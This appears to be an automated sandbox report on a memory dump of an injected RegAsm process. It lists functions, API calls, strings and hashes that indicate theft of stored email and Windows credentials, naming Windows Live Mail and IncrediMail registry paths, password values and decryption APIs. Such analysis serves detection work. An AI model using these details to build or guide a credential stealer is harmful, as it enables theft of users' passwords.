                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpymemset$??2@??3@ByteCharCloseFreeLibraryLoadLocalMultiWidestrlenstrtoul
                                                                                                                                                                                                                      • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                                                      • API String ID: 2976261921-2687544566
                                                                                                                                                                                                                      • Opcode ID: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                                                                                                      • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b08930b7453e48b2f0e0d8293135145b455c914adee6aec8c07cda6f7bc59332
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                                                      Function 00403E96 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                      • API String ID: 113626815-1670831295
                                                                                                                                                                                                                      • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                                                      • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                                                                                                      Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                      • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                                                      Function 004047CB Relevance: 21.0, APIs: 1, Strings: 11, Instructions: 49libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004047DA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                      • API String ID: 1029625771-192783356
                                                                                                                                                                                                                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                                                      Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                                                      Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                                                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                      • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                      • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                                                      Function 00410D3D Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                      • API String ID: 714388716-318151290
                                                                                                                                                                                                                      • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                                      • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                                                                                                                                                                                      Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                                                                                                                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                                                                                                                                      • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                                                                                                                                        • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                                                                                                                                        • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                                                                                                                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CB92
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1416211542-0
                                                                                                                                                                                                                      • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                      • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                                                                                                                                      Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                                      Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                      • API String ID: 912701516-1821301763
                                                                                                                                                                                                                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                                      Function 0040F802 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                      • String ID: Creds$ps:password
                                                                                                                                                                                                                      • API String ID: 313032062-1872227768
                                                                                                                                                                                                                      • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                                                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                                                      Function 00402FDB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040301E
                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040306B
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00403083
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004030B4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004030FC
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00403125
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                                                      • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                                                      • API String ID: 3672803090-3168940695
                                                                                                                                                                                                                      • Opcode ID: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                                                      • Instruction ID: c63447841566cf46c771af6046a8c2292ff1b2fb78a85e5f221a3b25c3a6e5c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9eb44310dfb29f03ef0e10aa8539b91ddc0c6df349914104ac0254ae78c74f6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C3140B280121CBEDB11EF91CC81EDEBB7CEF14345F0440A6B908A1052E7799F959FA4
                                                                                                                                                                                                                      Function 00408F1B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 3540791495-3849865405
                                                                                                                                                                                                                      • Opcode ID: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                                                      • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 746a6444b456afcb3e36d1fa8bdf2724fef8bbe8bc7db3e616028793154f0cb8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                                                      Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                      • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                      • Opcode ID: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
                                                                                                                                                                                                                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6622c3935392687b7cdf7bff07cfba8d523efe949d3c24d6b26d746122f1250
